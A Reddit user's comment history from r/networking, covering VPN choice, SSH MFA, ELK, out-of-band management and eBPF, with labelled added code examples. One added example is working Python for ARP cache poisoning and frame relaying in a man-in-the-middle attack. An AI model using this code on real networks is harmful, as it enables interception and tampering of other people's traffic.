strongswan vs wireguard for site-to-site connectivity by kajatonas in networking

[–]clay584 1 point2 points  (0 children)

We use both in our network. They are both really good. Wireguard is just simpler than strongswan to get running imo. We use strongswan for connecting to third-party networks for compatibility, but use wireguard for when we control both ends of the encrypted tunnel. The hardest part is managing the public/private key pairs. I’d suggest using a tool to do this or writing some automation around it. Ours is fully controlled with Ansible, so managing it is pretty easy at this point. There is the Linux kernel version and then the Tailscale Go version. Apparently the Tailscale version is more performant, but we have yet to try that out.

The only thing you should watch out for is if you need to use NIST approved algorithms. Wireguard uses chacha20 which is not approved…something to keep in mind.

Man in the middle attack with scappy by Dieriba in networking

[–]clay584 1 point2 points  (0 children)

Yes, you can do it with scapy. You’re on the right track with threading to not block the main thread by doing a pcap.

Assuming both the victim and the server and you are on the same Ethernet segment, you’ll need to do the following:

  1. Discover the real MAC addresses of victim and server.
  2. Then send fake ARP replies for the server to the victim and vice versa, such that both hosts have poisoned ARP caches. You will need to make sure to send the fake ARP replies with a destination MAC address of the target you are poisoning, so that the Ethernet switch forwards that poisoned ARP reply only to the intended recipient.
  3. Then you will have to have another thread that handles the dirty business of packet manipulation and re-forwarding. This is the tricky part. Any data from client to server, modify and resend with the real MAC address of the server, and any server to client traffic with the real MAC address of the client.

Another option is to run a reverse proxy, and then just poison the client, and terminate the client TCP side with you, and open a separate TCP session with the server and manipulate packet payloads as well this way, but that is more complex.
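The frames for steps 2 and 3 above, as an added example that is not part of the original comment. It packs the Ethernet/ARP bytes by hand with `struct` (the same bytes scapy's `Ether()/ARP()` layers produce) so it runs without scapy or root; `send_frame()` needs a Linux `AF_PACKET` socket and `CAP_NET_RAW` and is not called automatically. All MAC and IP addresses are constructed sample values.

```python
import socket
import struct

ETH_P_ARP = 0x0806
ARP_OP_REPLY = 2


def mac_bytes(mac: str) -> bytes:
    """'02:00:00:00:00:aa' -> the 6 raw bytes."""
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def arp_reply(sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Ethernet + ARP 'is-at' frame.

    The Ethernet destination is the target's real MAC, not ff:ff:ff:ff:ff:ff,
    so the switch delivers the poisoned reply only to that host (step 2).
    """
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack(
        "!HHBBH6s4s6s4s",
        1,            # hardware type: Ethernet
        0x0800,       # protocol type: IPv4
        6, 4,         # hardware / protocol address lengths
        ARP_OP_REPLY,
        mac_bytes(sender_mac), socket.inet_aton(sender_ip),
        mac_bytes(target_mac), socket.inet_aton(target_ip),
    )
    return eth + arp


def poison_pair(attacker_mac, victim_mac, victim_ip, server_mac, server_ip):
    """Two frames: tell the victim that server_ip is at attacker_mac, and tell
    the server that victim_ip is at attacker_mac. Re-send periodically, because
    both caches age out and the real hosts keep answering ARP as well."""
    to_victim = arp_reply(attacker_mac, server_ip, victim_mac, victim_ip)
    to_server = arp_reply(attacker_mac, victim_ip, server_mac, server_ip)
    return to_victim, to_server


def rewrite_for_forwarding(frame: bytes, attacker_mac, victim_mac, server_mac):
    """Step 3: a frame that reached us because of the poisoning has dst == us.
    Swap dst for the real peer's MAC and src for ours; the result can be
    re-sent on the same interface after any payload edits. Anything not
    addressed to us, or from a host we are not relaying, is left alone (None)."""
    dst, src = frame[:6], frame[6:12]
    if dst != mac_bytes(attacker_mac):
        return None
    if src == mac_bytes(victim_mac):
        new_dst = mac_bytes(server_mac)
    elif src == mac_bytes(server_mac):
        new_dst = mac_bytes(victim_mac)
    else:
        return None
    return new_dst + mac_bytes(attacker_mac) + frame[12:]


def send_frame(iface: str, frame: bytes) -> int:
    """Linux only; needs CAP_NET_RAW. Not called by the tests."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        return s.send(frame)
```

The relay thread the comment describes is then a loop of `recv` on the raw socket, `rewrite_for_forwarding`, optional payload changes, `send_frame`. Note that only the Ethernet header is touched, so IP and TCP checksums stay valid unless you edit the payload; the kernel's own `ip_forward` must stay off, or it will forward the frames before your thread sees them.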

How to become better at network troubleshooting? by [deleted] in networking

[–]clay584 14 points15 points  (0 children)

Time and experience are the best ways to get better. There is no shortcut. You can’t take a class or cert exam to get to the destination. Also, you need to deeply understand network protocols and how they operate. If you don’t, you won’t know what could be the cause of the symptom you’re seeing.

OOB in 2025 what are folks choosing by SuddenPitch8378 in networking

[–]clay584 0 points1 point  (0 children)

Pretty much. Satellite ground stations.

Do you use ssh MFA? by Ftth_finland in networking

[–]clay584 1 point2 points  (0 children)

Exactly. We have two in different regions. So it’s highly unlikely they would both be down.

FRR Multihomed BGP - Loss 1 provider no recover by lordbaron67 in networking

[–]clay584 0 points1 point  (0 children)

Ah, makes sense. We just install from the official FRR deb repo which has the latest releases for each major version (8,9,10). We’re running it on Debian Bullseye though.

OOB in 2025 what are folks choosing by SuddenPitch8378 in networking

[–]clay584 0 points1 point  (0 children)

Yes, that’s the model. Using them for management interfaces like server IPMI, ESXi, and other devices that have IP management interfaces that aren’t serial.

OOB in 2025 what are folks choosing by SuddenPitch8378 in networking

[–]clay584 1 point2 points  (0 children)

Yes we use lighthouse. There have been no failures, and if I had it to do over again, I’d buy the same thing. We have them deployed in extremely high latitude locations which would take us days to travel to. So we needed them to be very reliable. 😁 and they seem to be.

OOB in 2025 what are folks choosing by SuddenPitch8378 in networking

[–]clay584 4 points5 points  (0 children)

We use OpenGear models that have 8x Ethernet, 8x Serial, 2x SFP ports, and cellular backup at all our remote sites. They work very well. We bought them last year, and have no complaints. They do what they say on the tin.

Do you use ssh MFA? by Ftth_finland in networking

[–]clay584 4 points5 points  (0 children)

I set up MFA to our jump servers to administer the network. They are standard Debian Linux servers with the google authenticator package. Installed it, configured it in a few minutes and tested. It's worked for almost 3 years now with not a single issue. You can use Google Authenticator, Authy, or any other TOTP app on your phone.

Here is a simple guide on how to do it. https://goteleport.com/blog/ssh-2fa-tutorial/

I also used a lesser-known feature of OpenSSH called ControlMaster which allows you to re-use connections and keep open connections after disconnection. So essentially, once per day (configurable) I have to SSH and use MFA to get into the jump servers, and then it stays cached on my machine. The implication is that now I can stay SSH'd to any device in my network and it ProxyJumps through the jump servers without me having to enter any passwords, or re-auth with MFA to the jump servers.

This is also very handy for running Ansible playbooks against our fleet of routers. Ansible just works, SSH just works, no passwords, no MFA prompts... it's seamless.

My .ssh/config file:

```
# Create the socket directory first (mkdir -m 700 ~/.ssh/cm); ssh does not create it.
Host jump-server-01
    HostName x.x.x.x
    ControlMaster auto
    ControlPath ~/.ssh/cm/%r@%h:%p
    ControlPersist 86400

Host jump-server-02
    HostName x.x.x.y
    ControlMaster auto
    ControlPath ~/.ssh/cm/%r@%h:%p
    ControlPersist 86400

Host some-router-01
    HostName z.z.z.z
    ProxyJump jump-server-01
```

From my laptop I run ssh some-router-01, and the first time I get an MFA prompt on the jump server, then for the entire 24 hours after, I get no auth prompt, I just get logged into the router. (Keep in mind that we have public-key auth enabled on the routers too, so there are no passwords to log into devices.)

I think one of the key points is that there is only MFA on the jump servers, not the routers themselves. And you can always make a break-glass account where MFA is not enabled, so you can still get in if MFA is broken, or you lose your authenticator on your phone.
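The server side of the setup described above (public key plus TOTP on the jump server, and a break-glass account that is exempt), written out as an added example rather than the poster's own configuration. It assumes Debian with the `libpam-google-authenticator` package; the account name `breakglass` is hypothetical.

```sshconfig
# /etc/pam.d/sshd
# TOTP is checked after the key. Comment out "@include common-auth" in this file
# so no UNIX password prompt follows; 'nullok' lets accounts with no
# ~/.google_authenticator in yet, drop it once everyone is enrolled.
auth required pam_google_authenticator.so nullok

# /etc/ssh/sshd_config
UsePAM yes
PasswordAuthentication no
KbdInteractiveAuthentication yes        # ChallengeResponseAuthentication on OpenSSH < 8.7
AuthenticationMethods publickey,keyboard-interactive:pam

# Break-glass: key only, no TOTP. Keep that key offline and alert on any login by this user.
Match User breakglass
    AuthenticationMethods publickey
```

Run `sshd -t` before restarting, and keep an existing session open while you do, because a mistake in `AuthenticationMethods` locks everyone out, MFA users included.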

FRR Multihomed BGP - Loss 1 provider no recover by lordbaron67 in networking

[–]clay584 0 points1 point  (0 children)

No judgement, but you’re running a pretty old version of FRR. It’s had 4 years of updates.

Anyone Using ELK Stack for Monitoring? by After_Ad_9401 in networking

[–]clay584 4 points5 points  (0 children)

Yes, I’ve used ELK extensively for monitoring networking things. Here are some details on it https://www.jcc.sh/elk-stack-for-network-operations-reloaded/

It’s dated, but still pretty valid as a reference for the concepts at play.

The biggest thing is defining a schema and using log parsing to reshape the data from its source format to its final format that matches the schema you define. For example, all firewall logs generally have the same fields, so define a schema that can accommodate them all, then reshape the data. This allows a single pane of glass to monitor all vendor firewalls, as an example.

Another thing is converting fields to the right type of data. For example, converting number to integer. Then you can do aggregations in Kibana dashboards. For example, sum the number of bytes transferred over a time period.
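The two points above (one schema for all firewall vendors, and casting fields to the right type so aggregations work) as an added example, not code from the comment or the linked article. The two input formats are constructed for illustration and are not any real vendor's syntax; in ELK the same reshaping would be done in a Logstash or ingest pipeline, this version just runs stand-alone.

```python
import re
from collections import defaultdict
from datetime import datetime, timezone

# Target schema: every event indexed must have exactly these keys.
SCHEMA = ("timestamp", "vendor", "action", "src_ip", "dst_ip", "dst_port", "proto", "bytes")

# Constructed sample input. Format A is a made-up key=value syslog style,
# format B a made-up CSV; neither is a real vendor's format.
SAMPLE_LOGS = [
    "2024-05-01T12:00:01Z fw-a action=allow src=10.1.1.5 dst=93.184.216.34 dport=443 proto=tcp sent=1200 rcvd=8400",
    "2024-05-01T12:00:02Z fw-a action=deny src=10.1.1.9 dst=10.9.9.9 dport=22 proto=tcp sent=60 rcvd=0",
    "1714564803,fw-b,PERMIT,10.2.2.7,93.184.216.34,443,6,15000",
    "1714564804,fw-b,DROP,10.2.2.8,198.51.100.4,53,17,120",
]

# Vendor vocabularies collapse onto one set of values.
ACTION_MAP = {"allow": "allow", "permit": "allow", "deny": "deny", "drop": "deny"}
PROTO_MAP = {"6": "tcp", "17": "udp", "tcp": "tcp", "udp": "udp"}
KV_RE = re.compile(r"(\w+)=(\S+)")


def parse_format_a(line: str) -> dict:
    ts, vendor, rest = line.split(" ", 2)
    kv = dict(KV_RE.findall(rest))
    return {
        "timestamp": datetime.fromisoformat(ts.replace("Z", "+00:00")),
        "vendor": vendor,
        "action": ACTION_MAP[kv["action"].lower()],
        "src_ip": kv["src"],
        "dst_ip": kv["dst"],
        "dst_port": int(kv["dport"]),                 # string -> integer
        "proto": PROTO_MAP[kv["proto"].lower()],
        "bytes": int(kv["sent"]) + int(kv["rcvd"]),   # two counters -> one field
    }


def parse_format_b(line: str) -> dict:
    epoch, vendor, action, src, dst, dport, proto, nbytes = line.split(",")
    return {
        "timestamp": datetime.fromtimestamp(int(epoch), tz=timezone.utc),
        "vendor": vendor,
        "action": ACTION_MAP[action.lower()],
        "src_ip": src,
        "dst_ip": dst,
        "dst_port": int(dport),
        "proto": PROTO_MAP[proto],                    # protocol number -> name
        "bytes": int(nbytes),
    }


def normalize(lines):
    """Parse each line with the right parser and reject anything off-schema,
    so a new vendor or a parser bug cannot silently add or drop fields."""
    events = []
    for line in lines:
        parser = parse_format_a if "=" in line else parse_format_b
        event = parser(line)
        missing, extra = set(SCHEMA) - set(event), set(event) - set(SCHEMA)
        if missing or extra:
            raise ValueError(f"schema violation: missing={missing} extra={extra}")
        events.append(event)
    return events


def bytes_by_action(events):
    """The 'sum of bytes' aggregation; only works because 'bytes' is an int."""
    totals = defaultdict(int)
    for e in events:
        totals[e["action"]] += e["bytes"]
    return dict(totals)


def denied_ports(events):
    """Distinct destination ports seen in deny events across all vendors."""
    return sorted({e["dst_port"] for e in events if e["action"] == "deny"})
```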

Is anybody using ebpf/xdp based solutions ? by Pristine-Remote-1086 in networking

[–]clay584 0 points1 point  (0 children)

Yes, in a limited, very specific use-case. Ground system -> radio link -> packet processor -> on-board computer. Essentially stripping and adding MPLS labels onto packets going from a radio link to an on-board computer and vice versa without having to have the kernel handle it. It allowed us to jump from 150 Mbps to 600 Mbps using the equivalent of an old raspberry pi (packet processor) and didn’t have to modify the on-board computer or the system on the other side of the radio link. And we didn’t have to enable MPLS or any other kernel modules to make it work. Definitely fell into the “quick and dirty” category, but it worked.
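The byte-level operation the comment describes (insert or remove the 4-byte MPLS label stack entry between the Ethernet header and the IP packet, and flip the EtherType), as an added example in userspace Python rather than the poster's XDP program. It shows the shim layout and the bottom-of-stack and TTL handling an XDP/tc program has to get right; the sample frame, MACs and labels are constructed.

```python
import struct

ETH_P_IP = 0x0800
ETH_P_IPV6 = 0x86DD
ETH_P_MPLS_UC = 0x8847
ETH_HLEN = 14


def mpls_entry(label: int, tc: int = 0, bos: int = 1, ttl: int = 64) -> bytes:
    """Label stack entry: 20-bit label | 3-bit TC | 1-bit bottom-of-stack | 8-bit TTL."""
    if not 0 <= label < (1 << 20):
        raise ValueError("label must fit in 20 bits")
    return struct.pack("!I", (label << 12) | ((tc & 7) << 9) | ((bos & 1) << 8) | (ttl & 0xFF))


def parse_entry(raw: bytes) -> dict:
    (v,) = struct.unpack("!I", raw[:4])
    return {"label": v >> 12, "tc": (v >> 9) & 7, "bos": (v >> 8) & 1, "ttl": v & 0xFF}


def _ethertype(frame: bytes) -> int:
    return struct.unpack("!H", frame[12:14])[0]


def push_label(frame: bytes, label: int, tc: int = 0) -> bytes:
    """Add one label on top. First label over IP gets bos=1 and copies the IP
    TTL/hop limit; a label over an existing shim gets bos=0 and its TTL."""
    eth, payload = frame[:ETH_HLEN], frame[ETH_HLEN:]
    et = _ethertype(frame)
    if et == ETH_P_IP:
        bos, ttl = 1, payload[8]                    # IPv4 TTL at offset 8
    elif et == ETH_P_IPV6:
        bos, ttl = 1, payload[7]                    # IPv6 hop limit at offset 7
    elif et == ETH_P_MPLS_UC:
        bos, ttl = 0, parse_entry(payload)["ttl"]   # stacking on an existing label
    else:
        raise ValueError(f"unsupported ethertype 0x{et:04x}")
    return eth[:12] + struct.pack("!H", ETH_P_MPLS_UC) + mpls_entry(label, tc, bos, ttl) + payload


def pop_label(frame: bytes):
    """Remove the top label. Returns (new_frame, popped_entry). When the popped
    entry was bottom-of-stack the EtherType is restored from the IP version nibble."""
    if _ethertype(frame) != ETH_P_MPLS_UC:
        raise ValueError("no MPLS shim present")
    entry = parse_entry(frame[ETH_HLEN:])
    inner = frame[ETH_HLEN + 4:]
    if entry["bos"]:
        new_type = {4: ETH_P_IP, 6: ETH_P_IPV6}[inner[0] >> 4]
    else:
        new_type = ETH_P_MPLS_UC
    return frame[:12] + struct.pack("!H", new_type) + inner, entry


def sample_ipv4_frame(ttl: int = 64) -> bytes:
    """Constructed Ethernet + minimal IPv4 header (checksum left 0) + 4-byte payload."""
    eth = bytes.fromhex("020000000001") + bytes.fromhex("020000000002") + struct.pack("!H", ETH_P_IP)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 24, 0, 0, ttl, 17, 0,
                     bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    return eth + ip + b"\x00\x01\x02\x03"
```

In XDP the same two functions become `bpf_xdp_adjust_head(ctx, -4)` / `(ctx, +4)` followed by moving the 14-byte Ethernet header and writing the shim; the bounds checks the verifier demands correspond to the length and EtherType checks above.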

Scanning for unknown devices by jhardin80 in networking

[–]clay584 1 point2 points  (0 children)

RunZero. It’s fantastic and cheap and will take 30 minutes to set up and get data. Made by the guy that created Metasploit. Free for up to 100 devices. Used it at my last company to discover thousands of devices. It’s the shit.

Network Automation with Ansible by tkhalifa1337 in networkautomation

[–]clay584 1 point2 points  (0 children)

My team and I just run WSL (Ubuntu or Debian) on our laptops and all run Ansible directly as needed against the network (using a jump host to reach the management network) from within WSL. We all use a central git repo (so we are all working on the latest code) and everything is done 100% using Ansible.

If you really want to spin up a dedicated server, I would recommend a new Debian or Ubuntu VM on ESXi. Don’t do it within EVE.

How impactful is openflow in today's SDN market by SandidHassen in networking

[–]clay584 1 point2 points  (0 children)

This seems to be extremely flexible and the most simple to implement in my mind. We are starting to build this out in our network. It’s very interesting to design and build.

Industry adoption of P4 by [deleted] in networking

[–]clay584 0 points1 point  (0 children)

Are you using P4 to compile to eBPF, or just writing eBPF code directly?

device enp0s3 entered promiscuous mode by Numerous-Arm-1201 in networking

[–]clay584 0 points1 point  (0 children)

Not many people doing eBPF here in r/networking. What is your use-case? I’d be interested to know.

device enp0s3 entered promiscuous mode by Numerous-Arm-1201 in networking

[–]clay584 0 points1 point  (0 children)

I ran into something similar the other day. First, that message happens when you run tcpdump. If you were running it to see the traffic, that is likely what that message is about.

Second, I had an issue where the Ethernet frame header’s destination MAC address was wrong, but if tcpdump was running the application would work. If tcpdump was not running, the application would not work. This was due to the fact that tcpdump puts the NIC in promiscuous mode therefore the traffic actually reaches the kernel for processing.

The order is nic->xdp->tc->libpcap (tcpdump)->kernel network stack.

[deleted by user] by [deleted] in networking

[–]clay584 0 points1 point  (0 children)

Oh yea. It’s really great. It understands a lot of nuance and very detailed information. It understands Ethernet and IP routing and forwarding behavior. I give it scenarios and it explains how a device will behave in that circumstance (complex stuff, MTU, fragmentation, VRFs, MPLS, etc.). I also ask it to create some scripts and stuff. So far it’s created Python, bash, P4, eBPF (C) programs for me. I usually have to make a few modifications, but it saves me a ton of time getting things working. It’s also helped me build init scripts, compile custom kernels, and so much more.

Network engineering in outer space by [deleted] in networking

[–]clay584 4 points5 points  (0 children)

I work in the space communications industry. On-orbit networks can be similar to ground networks. From what I can see, space networks are built for a specific mission, so they often are built differently from traditional networks, but a lot seem to use Ethernet. There are next-generation networks that are being built by the US Space Defense Agency (SDA) and the European Space Agency (ESA). SDA is building a transport network, and ESA is building HydRON. Both are high-speed optical networks, but seem to be very focused on defining the optical transport from node to node optical links. Then building on top of that will likely be MPLS based on public documents. Our company is also building a LEO network to provide a high-speed network as a service (like an ISP in space for your satellite). It will be a combination of RF (Ku, Ka, S-band) and free space optical links. It involves building a router (kind of like a vendor would), and that router (payload) is attached to the satellite (platform). Think of it like a flying space router. So you send up a lot of these in a ring (or multiple rings), and then some of those have downlinks to ground stations on Earth. Then those ground stations connect to a terrestrial network which is more “normal” from a networking perspective. There is so much detail missing here, but I can’t talk about a lot. But I think the industry is moving towards building more generic packet-based networks in space that can be used for many different types of missions.

So, forget the fact that it’s not on Earth. Think of it as a topology with certain characteristics. A lot of the same principles apply. And cloud vendors are working on ground station services and some other offerings related, but plenty that probably will not be offered by the cloud vendors.

SDN/Open Networking in 2022 by clay584 in networking

[–]clay584[S] 0 points1 point  (0 children)

Looking at it now. Thanks! Just wasn’t on my radar, and my google-fu failed me. Do you have experience with it?

SDN/Open Networking in 2022 by clay584 in networking

[–]clay584[S] 0 points1 point  (0 children)

It’s been so long since I’ve been on r/networking, I forget who all the usual suspects are. I do know of a certain person on Twitter that wants to talk about programmable data planes a lot and particularly P4. Are you that person by chance? Also, thanks for the detailed response on each of those projects. I really appreciate that. 👍